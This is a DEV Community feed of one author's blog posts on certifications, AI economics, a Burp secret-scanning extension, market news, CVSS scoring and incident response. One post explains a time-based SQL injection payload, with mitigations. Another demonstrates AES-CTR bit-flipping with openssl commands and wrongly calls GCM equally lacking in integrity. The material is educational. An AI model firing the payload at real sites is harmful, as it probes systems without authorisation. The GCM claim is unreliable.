DEV Community: Hafiz Muhammad Attaullah

From Foundations to Cybersecurity Architect: My Microsoft Certification Journey

Hafiz Muhammad Attaullah — Fri, 18 Apr 2025 20:59:48 +0000

it’s a moment of pride and reflection for me as I officially earned the Microsoft Certified: Cybersecurity Architect Expert (SC-100) certification — the highest level in Microsoft’s security track. But let me be clear: this wasn’t just a single exam. This was a journey — a story of growth, challenges, discipline, and an unshakable commitment to becoming better at what I do. This is my journey, from SC-900 all the way to SC-100 — and everything in between.

It all started with curiosity. Cybersecurity was always more than a buzzword to me. It was about protecting value, designing resilience, and staying one step ahead of threats. I knew that to truly excel in this domain, I needed a solid framework to structure my learning. That’s when I decided to pursue Microsoft’s Security certification path — a roadmap designed to build skills layer by layer.

I began with SC-900, Microsoft’s Security, Compliance, and Identity Fundamentals certification. It might seem basic to some, but for me, it laid the foundation. It helped me understand Microsoft’s security philosophy — from Zero Trust to compliance, governance, and risk. More importantly, it sparked the desire to go deeper.

Then came SC-300, the Identity and Access Administrator certification. This is where things got technical. I immersed myself in managing Azure Active Directory, identity protection, multifactor authentication, B2B/B2C identities, conditional access, and secure hybrid identity strategies. It wasn’t easy. There were long nights, failed labs, and countless retries — but I pushed through. I didn’t just want to pass — I wanted to master it.

And then, finally, SC-100 — the Cybersecurity Architect Expert. The title alone was intimidating. This exam expects you to think like a strategist, an architect, and a leader — all at once. It required me to bring together everything I had learned before, and add more. Designing security operations, managing regulatory compliance, leading risk assessments, securing hybrid and multi-cloud environments, implementing end-to-end Zero Trust — this was no joke.

But I was ready. Because by now, it wasn’t just about certifications. It was about becoming the kind of professional who can lead organizations through secure digital transformation. It was about proving to myself that I could handle the pressure, own the responsibility, and live up to the title of 'Architect'.

When I saw the 'Pass' result — I froze. Not because I doubted myself, but because the entire journey flashed before my eyes. Every lecture, every lab, every line of notes — it all came together in that one moment.

What did I learn? That persistence pays off. That growth is never linear. That you don’t need to rush — you just need to move with purpose. And that if you dream of being at the top, you have to start at the bottom and climb intentionally.

To anyone reading this — whether you’re just starting with SC-900 or aiming directly for SC-100 — know this: the journey is worth it. Every step teaches you something new. Stay consistent. Stay hungry. And never stop learning.

Thanks to Allah SWT for the strength and clarity. Thanks to my mentors, peers, and the Microsoft community for the guidance and support. And now — time to apply everything in the real world and help organizations build security by design.

Teaching AI in 2025: Why We Must Include Its Financial Reality

Hafiz Muhammad Attaullah — Tue, 15 Apr 2025 09:01:07 +0000

Just wrapped up a thought-provoking session with leaders from academia and the cloud industry — diving deep into AI, R&D, and the economics behind it all. One of the most important and sobering takeaways? Despite all the hype, most AI companies aren't actually making money — and the only real winners so far are those who power the infrastructure, not those building the models.

We discussed how companies like OpenAI are currently on track to spend $9 billion in 2024 while making just $4 billion, with the bulk of their revenue going straight into compute costs. Even paying customers reportedly cost the company more than they bring in. Similarly, Anthropic, backed by giants like Amazon and Google, lost over $5.6 billion last year while generating under a billion in revenue. Stability AI, once a rising star, has faced funding challenges and leadership turbulence. And even newer entrants like Perplexity, despite high valuations, only brought in $56 million last year and remain unprofitable.

In stark contrast, Nvidia, a hardware company rather than an AI startup, is thriving. In Q4 of FY24 alone, it reported $22.1 billion in revenue and $12.3 billion in profit, mostly driven by surging demand for its AI-optimized GPUs. Companies like OpenAI, Anthropic, and major cloud providers (AWS, Azure, Google Cloud) are essentially building their entire infrastructures on Nvidia’s chips — making it the backbone of this AI boom.

What’s even more concerning is the broader industry picture. Microsoft and Google are pouring tens of billions into AI infrastructure — yet their generative AI products like Copilot and Gemini have relatively small user bases compared to their traditional offerings. Many of these tools are being pushed into enterprise suites more out of pressure to “look futuristic” than real customer demand. Meanwhile, a staggering portion of AI revenue is tied up in subscriptions and cloud credits, not sustainable business models.

So what does all of this mean for us — as educators, researchers, and cloud service providers? It’s clear we need to start preparing students and professionals not just to build and use AI, but to deeply understand the economics behind it, the hardware-software balance, and what it truly means to create scalable, sustainable, and valuable technology. The hype is loud — but the numbers are louder.

This conversation isn’t over. In fact, it’s just beginning.

Truffle Security: Enhancing Burp Suite with Automated Secret Detection

Hafiz Muhammad Attaullah — Thu, 13 Mar 2025 18:04:39 +0000

Introduction

As the cybersecurity landscape continues to evolve, security professionals and developers face an ongoing challenge: identifying and mitigating exposed secrets in web applications. Hardcoded credentials, API keys, and sensitive tokens are common vulnerabilities that, if leaked, can lead to severe security breaches.

To address this issue, Truffle Security, a Burp Suite extension, provides an automated and efficient way to detect and manage secrets embedded in web applications. This tool helps security professionals streamline their assessments, ensuring that sensitive data is identified and mitigated before it can be exploited by attackers.

What is Truffle Security?

Truffle Security is a Burp Suite extension that integrates seamlessly into security testing workflows. It is designed to scan for exposed secrets within web traffic, helping users identify security risks quickly and efficiently. With its automation capabilities and customizable detection rules, Truffle Security is a valuable tool for penetration testers, bug bounty hunters, and security researchers.

Key Features

1. Automated Secret Detection

Truffle Security is equipped with powerful detection algorithms that scan HTTP requests, responses, and other Burp Suite interactions for exposed credentials, API keys, tokens, and other sensitive data. This eliminates the need for manual inspection, saving time and improving accuracy.

2. Seamless Integration with Burp Suite

As a Burp Suite extension, Truffle Security works within the Burp Extender tool. This integration allows users to leverage its scanning capabilities directly within their Burp Suite security assessments, without the need for external tools or configurations.

3. Customizable Detection Rules

Security professionals can fine-tune Truffle Security by defining custom rules to detect specific types of secrets based on their unique security needs. This ensures that the extension can be adapted to different application environments and threat models.

4. Open-Source and Community-Driven

Truffle Security’s source code is available on GitHub, allowing developers and researchers to review, modify, and contribute to its continuous improvement. This transparency ensures that the extension remains up to date with evolving security challenges.

5. Efficient and Lightweight

Unlike many security tools that introduce performance bottlenecks, Truffle Security is designed to be lightweight and efficient. It does not significantly impact Burp Suite’s memory or CPU usage, making it ideal for real-time security assessments.

How to Install and Use Truffle Security

Installation via the BApp Store

Truffle Security can be installed directly from Burp Suite’s BApp Store using the Burp Extender tool. Here’s how:

Open Burp Suite.
Navigate to Extender > BApp Store.
Search for Truffle Security.
Click Install and follow the on-screen instructions.

Offline Installation

If you prefer offline installation, you can download the extension from the BApp Store and manually import it into Burp Suite’s Extender module.

Using Truffle Security in Burp Suite

Enable the Extension – Once installed, ensure Truffle Security is enabled in the Burp Extender settings.
Configure Detection Rules – Customize the extension’s secret detection rules based on your specific security requirements.
Start Scanning – Run security assessments, and Truffle Security will automatically scan for exposed credentials within HTTP requests, responses, and other web traffic.
Review and Mitigate Findings – The tool will highlight potential security risks, allowing users to take necessary actions to mitigate them.

System Impact and Performance

Overall System Impact: Minimal
Memory Usage: Low
CPU Usage: Low
Scanner Performance: Does not introduce noticeable slowdowns

Truffle Security is optimized for efficiency, ensuring that security professionals can conduct assessments without compromising system performance.

Important Disclaimer

Truffle Security is developed by third-party contributors, and while it is a powerful tool, PortSwigger Web Security does not provide any warranties regarding its quality or effectiveness. Users should evaluate and test the extension within their security environments before relying on it for critical assessments.

Conclusion

Truffle Security is a valuable addition to any security professional’s toolkit, offering automated secret detection, Burp Suite integration, and customizable rules to improve web application security. Whether you are a penetration tester, security researcher, or DevSecOps professional, this extension provides a fast and efficient way to identify and mitigate exposed credentials before attackers can exploit them.

For more information, visit the BApp Store or explore the source code on GitHub.

Worldwide Cybersecurity market summary Q1 2024

Hafiz Muhammad Attaullah — Fri, 28 Jun 2024 04:53:27 +0000

In today's rapidly evolving cybersecurity landscape, strategic partnerships and efficient distribution channels are more crucial than ever. With the majority of cybersecurity spending flowing through partners, understanding these dynamics can provide key insights into market trends and vendor strategies.

Overview of Cybersecurity Channel Spending

The majority (over 90%) of cybersecurity spending is routed through partners, indicating a strong reliance on the channel.
Last quarter, the cybersecurity channel grew by 8.6%, amounting to US$18.5 billion.
Channel-based spending on cybersecurity technology accounted for 91.6% of the total $20.3 billion market.
According to Canalys data, 67.9% of the total cybersecurity market spending went through two-tier partners via distributors.
One-tier partners represented 23.7% of the market, while direct sales accounted for the remaining 8.4%.

Partner Updates from Leading Cybersecurity Vendors

CrowdStrike

Entered into distributor agreements with SB&C in Japan and Ignition in the UK and the Nordics.
Strengthened relationships with Global System Integrators (GSIs) such as HCLTech, TCS, Deloitte, EY, and Dell.
These moves are expected to enhance CrowdStrike's market reach and integration capabilities.

Palo Alto Networks

Enabled partners in the EMEA and APAC regions to sell its software through private listings on the AWS Marketplace.
Leveraged the DSOR program in collaboration with Westcon-Comstor to streamline the process.
This approach is aimed at simplifying procurement and expanding the sales channels for Palo Alto Networks' products.

SentinelOne

Expanded its distributor agreement with Exclusive Networks, giving partners access to its Extended Detection and Response (XDR) offering.
Signed a deal with Sherweb, allowing SentinelOne products to be added to Sherweb’s marketplace for Managed Service Providers (MSPs).
These expansions are intended to enhance the distribution and accessibility of SentinelOne’s advanced cybersecurity solutions.

Sophos

Broadened its distributor relationship with Infinigate Group to include the UK.
This expansion is set to improve Sophos’ market penetration and support capabilities within the region.

ESET

Updated its Partner Connect Program to include an annual rebate aimed at incentivizing renewals.
Introduced a comprehensive 90-day onboarding and training program for new partners.
These updates are designed to enhance partner engagement and drive sustained growth.

Zscaler

Announced a strategic shift to an ecosystem model to evolve its partner strategy.
The new model aims to expand the types of partners Zscaler engages with, fostering technology alliances, simplifying procurement processes, and encouraging collaborative efforts on customer projects.
This evolution is expected to broaden Zscaler’s market impact and facilitate integrated cybersecurity solutions.

Conclusion

The latest data and partner updates from leading cybersecurity vendors highlight the critical role of the channel in driving market growth. With the majority of cybersecurity spending going through partners, the strategic moves by vendors like CrowdStrike, Palo Alto Networks, SentinelOne, Sophos, ESET, and Zscaler demonstrate a strong commitment to enhancing their partner ecosystems and expanding their market reach. These efforts not only facilitate better distribution and sales but also foster innovation and collaboration within the cybersecurity industry.

Integrate DEV.to blogs to WordPress site

Hafiz Muhammad Attaullah — Fri, 19 Apr 2024 08:26:04 +0000

Hello community!

I've been diving into WordPress over the past few months, and to test my knowledge so far, so developed a little widget-plugin. It's designed to display your DEV posts right on your WordPress sidebar!

Overview:
The Dev-to-WordPress plugin is a simple yet effective tool for integrating your articles from DEV.to into your WordPress website. Ideal for bloggers and developers eager to share their DEV.to content directly on their WordPress platforms, this plugin enhances content visibility and reader engagement.

Key Features:
Widget Integration: Effortlessly showcase your latest DEV.to articles using a customizable sidebar widget. This feature can be added to any widget area supported by your WordPress theme, ensuring a smooth integration with your existing site layout.
Shortcode Capability: For those times when you need to spotlight a specific post within your WordPress content, the Dev-to-WordPress plugin provides a handy shortcode feature. This allows for the embedding of any DEV.to post directly into your pages or posts with ease.
Usage:

Widget:
The Dev-to-WordPress sidebar widget serves as a gateway to your DEV.to blog posts. Once set up, it displays the latest articles linked to your DEV.to user profile. To implement this widget:

Head to the Widgets section under the Appearance menu in your WordPress admin panel.
Drag the Dev-to-WordPress widget to any widget area your theme supports.
Enter your DEV.to username in the widget settings and save. Your latest posts will then automatically appear in the designated widget area.

Shortcode:
To embed a specific DEV.to post within your site's content, use the following shortcode method:

Insert the shortcode below in the WordPress editor at your desired location:

[devtowordpress post="https://dev.to/username/post-url-example"]

Substitute "https://dev.to/username/post-url-example" with the actual URL of the DEV.to post you wish to display.

Technical Note:
As DEV.to does not currently offer an API, the plugin works by making requests to a hardcoded URL to fetch the content. This method ensures that your WordPress site can display the latest posts without direct API support.

Download and Installation:
For the latest version of the Dev-to-WordPress plugin:

Visit the official plugin page and look for the "Releases" section.
Download the plugin as a .zip file from this recent release.
Installation:
Log into your WordPress admin panel.
Navigate to Plugins > Add New and select the 'Upload Plugin' button.
Upload the downloaded .zip file and select 'Install Now'.
Once installed, activate the plugin through the 'Plugins' menu in WordPress.

Final Remarks:
The Dev-to-WordPress plugin is an excellent resource for developers and content creators who actively use DEV.to and WordPress. It facilitates seamless integration of DEV.to content into WordPress sites, promoting consistency across your online platforms, enhancing user engagement, and simplifying content management. Whether you're a seasoned blogger or a budding developer, this plugin is a valuable addition to your WordPress toolkit.

Delay-Based Attack Payload

Hafiz Muhammad Attaullah — Fri, 19 Apr 2024 07:42:35 +0000

Example:
https://example[.]com/’XOR(SELECT(0)FROM(SELECT(SLEEP(2)))a)XOR’Z

In the realm of cybersecurity and web application security testing, SQL injection (SQLi) remains a critical concern, posing significant risks to data integrity and system security. This writeup delves into a specific SQL injection technique aimed at causing delays in website responses, highlighting its methodology, potential impact, and mitigation strategies.

The provided payload, ‘XOR(SELECT(0)FROM(SELECT(SLEEP(2)))a)XOR’Z’, serves as an example of a delay-based SQL injection attack. Let’s dissect the methodology and components of this payload:

XOR Operator Usage: The ‘XOR’ operator, which stands for “exclusive or,” is utilized in SQL injection to manipulate query logic and evade input sanitization mechanisms. By strategically placing XOR within the payload, attackers attempt to alter the query’s behavior and inject malicious code.
Subquery with Sleep Function: The payload contains a subquery ‘SELECT(0)FROM(SELECT(SLEEP(2)))a’ designed to execute a sleep function for 2 seconds. This sleep function introduces an intentional delay in the query execution, which can be leveraged by attackers to detect SQL injection vulnerabilities and assess the system’s responsiveness.
Payload Termination: The payload concludes with ‘XOR’Z’, which aims to terminate the injected SQL code and prevent syntax errors or unintended behavior in the original query. Proper payload termination is crucial for maintaining attack stealth and minimizing the risk of detection.
It’s imperative to approach SQL injection testing and security assessments ethically and responsibly. Unauthorized or malicious exploitation of vulnerabilities can lead to legal consequences and compromise system integrity.

Mitigation strategies for defending against SQL injection attacks include:

Input Validation: Implement strict input validation mechanisms to sanitize user inputs and prevent malicious SQL code injection.
Parameterized Queries: Utilize parameterized queries or prepared statements in database interactions to separate data from SQL commands, reducing the risk of injection attacks.
Web Application Firewalls (WAFs): Deploy WAFs with SQL injection detection capabilities to monitor and block suspicious requests before reaching the application server.
Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and remediate SQL injection vulnerabilities proactively.
So, while the delay-based SQL injection attack technique showcases vulnerabilities in web applications, it underscores the importance of robust security practices, continuous monitoring, and collaboration between security professionals and developers to fortify systems against evolving cyber threats.

Regards,

Hafiz Muhammad Attaullah

Deletion of Data = Integrity Impact, Deletion of Data Availability Impact

Hafiz Muhammad Attaullah — Fri, 29 Mar 2024 00:35:36 +0000

Does Data Deletion impact Availability?

Picture this scenario:
You uncover a vulnerability that would allow an attacker to delete all files in the web server’s root directory.

How would you rate the Availability metric for this vulnerability on the CVSS calculator?

High? Low? None?

If you would have asked this question to me a few years ago, I would have answered:

High, isn’t it obvious?
This vulnerability allows an attacker to delete all files from the web server’s root directory. This would make the website unusable for other users. Hence, “High Impact” on availability.

However, let's read the definition of the Availability metric in the CVSS specification:

While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email).
https://lnkd.in/exVsP3BP

In simple terms, it means “Availability” in CVSS calculator is the availability of the underlying system/service, not the availability of data.

Now, let’s look back at the above web server file deletion example and ask ourselves this question:

Does deleting all files in the website’s root directory impact the availability of the web “service”?

It doesn’t. The web service is still running. The only difference is that it is now not serving the intended files. Hence, this vulnerability does not affect Availability, but it impacts Integrity.

So, remember this:
Deletion of Data = Integrity Impact
Deletion of Data ≠ Availability Impact

This a very common misconception. So common is this, that First[.]org has a section dedicated clarifying this in the CVSS user guide:
https://lnkd.in/eYYKdrsT


✍️ What are your thoughts?
♻️ Reshare if this hits.

Cybersecurity Budget Analysis

Hafiz Muhammad Attaullah — Fri, 29 Mar 2024 00:33:54 +0000

🔒 Unraveling the Complexities of Cybersecurity Budget Analysis 🔒

In the realm of cybersecurity, discussions surrounding budget allocation can be fraught with complexities. While some rely on industry benchmarks, I urge you to take a step back and consider a more comprehensive approach. Let's delve into a different statistical analysis of cybersecurity budgets, shedding light on why it's crucial to look beyond simple percentages.

1️⃣ Risk-Based Budgeting: Rather than fixating on arbitrary percentages, a more effective approach is to adopt risk-based budgeting. Start by evaluating your organization's unique risk landscape. Consider the potential impact of cyber threats, the likelihood of their occurrence, and the value of the assets at stake. This analysis allows you to prioritize your cybersecurity investments and allocate resources where they are most needed.

2️⃣ Cost of a Breach: Understanding the cost of a potential data breach is a critical factor in determining your cybersecurity budget. Conduct a thorough assessment of the potential financial and reputational damage that a security incident could inflict on your organization. By quantifying the potential costs, you can allocate funds to preventive measures, incident response capabilities, and cyber insurance accordingly.

3️⃣ Maturity Model Assessment: Consider adopting a maturity model assessment, such as the NIST Cybersecurity Framework or the ISO 27001 standard. These frameworks provide a structured approach to evaluate your organization's cybersecurity posture and identify areas that require investment. By conducting a maturity assessment, you can align your budget with specific improvement goals and measure progress over time.

4️⃣ Return on Investment (ROI): It's crucial to evaluate the return on investment for your cybersecurity initiatives. This entails assessing the potential benefits and impact of each investment, such as reduced risk exposure, improved incident response capabilities, and enhanced regulatory compliance. By quantifying the expected ROI, you can make informed decisions about allocating resources to initiatives that deliver the most value to your organization.

5️⃣ Continuous Monitoring and Adjustment: Cybersecurity is a dynamic field, and your budget should reflect that. Implement a system of continuous monitoring and adjustment, where you regularly evaluate the effectiveness of your investments and make adjustments based on emerging threats, technological advancements, and changes in your organization's risk profile. This proactive approach ensures that your budget remains aligned with evolving cybersecurity needs.

Remember, statistical analysis of cybersecurity budgets should go beyond mere percentages. Embrace risk-based budgeting, factor in the cost of potential breaches, leverage maturity models, evaluate ROI, and maintain a flexible mindset through continuous monitoring and adjustment.

By adopting this holistic approach, you can develop a cybersecurity budget that aligns with your organization's specific risks, goals, and priorities. It enables you to make informed decisions that maximize the effectiveness of your cybersecurity investments and ultimately protect your organization from ever-evolving cyber threats.

Incident Response For Common Attack Types

Hafiz Muhammad Attaullah — Wed, 11 Oct 2023 17:43:42 +0000

Incident Response For Common Attack Types

Brute Forcing

Details:
Attacker trying to guess a password by attempting several different passwords
Threat Indicators:
Multiple login failures in a short period of time
Where To Investigate:
• Active directory logs
• Application logs
• Operational system logs
• Contact user
Possible Actions:
If not legit action, disable the account and investigate/block attacker

Botnets

Details:
Attackers are using the victim server to perform DDoS attacks or other malicious activities
Threat Indicators:
• Connection to suspicious IPs
• Abnormal high volume of network traffic
Where To Investigate:
• Network traffic
• OS logs (new processes)
• Contact server owner
• Contact support team
Possible Actions:
If confirmed:
• Isolate the server
• Remove malicious processes
• Patch the vulnerability utilized for infection

Ransomware

Details:
A type of malware that encrypts files and requests a ransom (money payment) from the user to decrypt the files
Threat Indicators:
• Anti-Virus alerts
• Connection to suspicious Ips
Where To Investigate:
• AV logs
• OS logs
• Account logs
• Network traffic
Possible Actions:
• Request AV checks
• Isolate the machine

Data Exfiltration
Details:
The attacker (or rogue employee) exfiltrates data to external sources
Threat Indicators:
• Abnormal high network traffic
• Connection to cloud -storage solutions (Dropbox, Google Cloud)
• Unusual USB Sticks
Where To Investigate:
• Network traffic
• Proxy logs
• OS logs
Possible Actions:
• If employee: Contact manager, perform full forensics
• If external threat: Isolate the machine, disconnect from network
Compromised Account

Details:
Attackers get access to one account (via social engineering or any other method)
Threat Indicators:
• Off-hours account logins
• Account group changes
• Abnormal high network traffic
Where To Investigate:
• Active directory logs
• OS logs
• Network traffic
• Contact user for clarifications
Possible Actions:
If confirmed:
• Disable account
• Password changes
• Forensic investigations

Denial Of Service (Dos/DDoS)

Details:
When attacker can cause interference in a system by exploiting DoS vulnerabilities or by generating a high volume of traffic
Threat Indicators:
Abnormal high network traffic in public facing servers
Where To Investigate:
• Network traffic
• Firewall logs
• OS logs
Possible Actions:
• If DoS due to vulnerabilities: Contact the patching team for remediation
• If DDoS due to network traffic: Contact network Support or ISP

Don't go straight into cyber

Hafiz Muhammad Attaullah — Fri, 08 Sep 2023 17:48:04 +0000

When I look back on all the things I've learned just to get to the point where penetration testing made sense for me, I can see now why I was told SOOO many times 'don't go straight into cyber.'

But, and let's be real here... my inner monologue was:

"Help desk sucks, and I don't want to be forced into systems administration because that's even worse. Networking? Oh man that's simple and the only reason it seems hard is that it's so boring. Coding? That stuff makes me want to punch a wall it's so hard (I'm talking production level code)."

I JUST WANTED TO BE IN SECURITY... and in my case I love popping boxes and finding vulnerabilities in code.

Here's the thing though, while prepping for my OSCP I have utilized sysadmin while setting up VMs, setting up MS Server, and a whole lot while interacting with Linux.

My web dev skills have come into play while analyzing code and vulnerabilities in web apps... and at various points while setting up web servers to host client code for analysis.

Networking... guys that comes up all over the place and I'm not kidding about that at all. Do not skip networking! The CCNA will SAVE YOUR LIFE!

What I'm saying is that unfortunately for the new people I'm doubling down on the statements put forward by others saying you can't go straight into cyber... at least you shouldn't. And you DEFINITELY can't go straight into pentesting!

In today's job market especially, I'd be looking at networking combined with cloud expertise as a staging ground for a career in cyber security.

Can You Trust AES Encryption?

Hafiz Muhammad Attaullah — Sat, 08 Jul 2023 06:41:20 +0000

In this article, I will not break the AES method (as it has yet to be broken), but breach its integrity. This is because some modes of AES are not good at handling the integrity of the message. The fast stream cipher modes, such as with CTR and GCM are especially prone to this lack of integrity checking, as it is easy to pick off the characters to target.

As a magic trick, I will take the encrypted message of:

Pay Bob 1 dollar

and then flip a few bits to give the ciphertext for:

Pay Bob 2 dollar

In ASCII, a ‘1’ is 0110001, and a ‘2’ is 0110010, and so all I have to do, is to find the place of the character I want to flip in the ciphertext, and then flip the two least significant bits.

First, I will encrypt the message using AES CTR mode — a fast stream cipher mode with AES — and use a passphrase of “Bob123”. The encryption key will be generated using PBKDF2:

$ echo "Pay Bob 1 dollar" | openssl enc -k bob123 -e -aes-128-ctr -pbkdf2 >ciphertext

The ciphertext will be in a binary form:

$ cat ciphertext
Salted__?T????i??k=e??n??.3?%

We can then use xxd to convert this binary format into a ciphertext so that we can edit the ciphertext:

$ xxd ciphertext > data
$ cat data
00000000: 5361 6c74 6564 5f5f f354 1385 819d f1a3  Salted__.T......
00000010: 69fa 816b 3d65 80ed 136e a405 f02e 3307  i..k=e...n....3.
00000020: e6

AES CTR is a stream mode, so it is easy to find all of the characters in the cipher, as they map straight to their position in the plaintext. Now, we ignore that last byte (e6) and count back the number of characters to the ciphertext of ‘1’. In this case, it is eight characters from the end, so let’s use change the ciphertext to:

(base) billbuchanan@ASecuritySite ~ % cat data
00000000: 5361 6c74 6564 5f5f f354 1385 819d f1a3  Salted__.T......
00000010: 69fa 816b 3d65 80ed 106e a405 f02e 3307  i..k=e...n....3.
00000020: e6

In this case, I have changed “136e” to “106e”, and only flipped two bits (from 0010011 to 0010000, and which should change a ‘1’ to a ‘2’ ). Now we will convert the cipher back into binary, and decrypt:

% xxd -r data > ciphertext
% cat ciphertext
Salted__?T????i??k=e??n??.3?%
% cat ciphertext | openssl enc -k bob123 -d -aes-128-ctr -pbkdf2   
Pay Bob 2 dollar

And magically, we have converted one dollar into two!!!!

Why does this happen? Well, the integrity checking in OpenSSL is not very good, and it struggles to detect whether bits have been flipped in the cipher.

Here is the demo:

Overall, CTR and GCM are two of the fastest and widely used modes in AES. Their great advantage is that they convert the block mode into a stream cipher (and thus do not need padding and can be processed in parallel). They are only beaten for performance by ECB, and which has serious weaknesses (as it has no nonce input):

If you are interested in the performance of AES modes, try here:
https://medium.com/asecuritysite-when-bob-met-alice/whats-the-fastest-symmetric-cipher-and-mode-3d6e77841c2b

How does SecOps work with DevOps?

Hafiz Muhammad Attaullah — Tue, 20 Jun 2023 17:58:01 +0000

The level of competition driven by digital disruption is intense. Coping with the demand for application delivery life cycles measured in seconds — with shrinking resources and increased complexity — requires a new approach. To compete today, leaders are automating application delivery to operationalize their competitive advantage.

Using a DevOps approach, companies can deliver applications faster, at a higher level of quality, and at a lower cost. In fact, a study by McKinsey found that companies that embrace an agile DevOps approach to development, testing, and operations see an 83 percent improvement in time to market, 90 percent faster updates to servers, and a near 50 percent reduction in handoffs per process.

As organizations “shift left” (test early and often in the software development life cycle process) to improve agility, this naturally creates new challenges and exposes different bottlenecks in their DevOps processes. For example, compliance and security remains a manual, ad‐hoc activity at the end of a release, which forces tough decisions about risk acceptance versus costly late code fixes. Furthermore, cloud adoption and containerization introduce mode‐two (new and innovative) resources into these processes that create real security and compliance gaps that most organizations haven’t considered. Without a comprehensive compliance strategy that addresses these issues, organizations will eventually fall behind competitors and increase their risk of data breaches and ransomware.

SecOps helps organizations gain a competitive advantage by increasing agility, while closing security and compliance gaps associated with the latest cloud and container technologies. A comprehensive SecOps program provides a unified view of compliance data collected across data center, cloud, and container resources that is analyzed against flexible predefined policies. Compliance checks can also be embedded directly in DevOps pipelines for instant feedback regarding go and no‐go decisions in the process.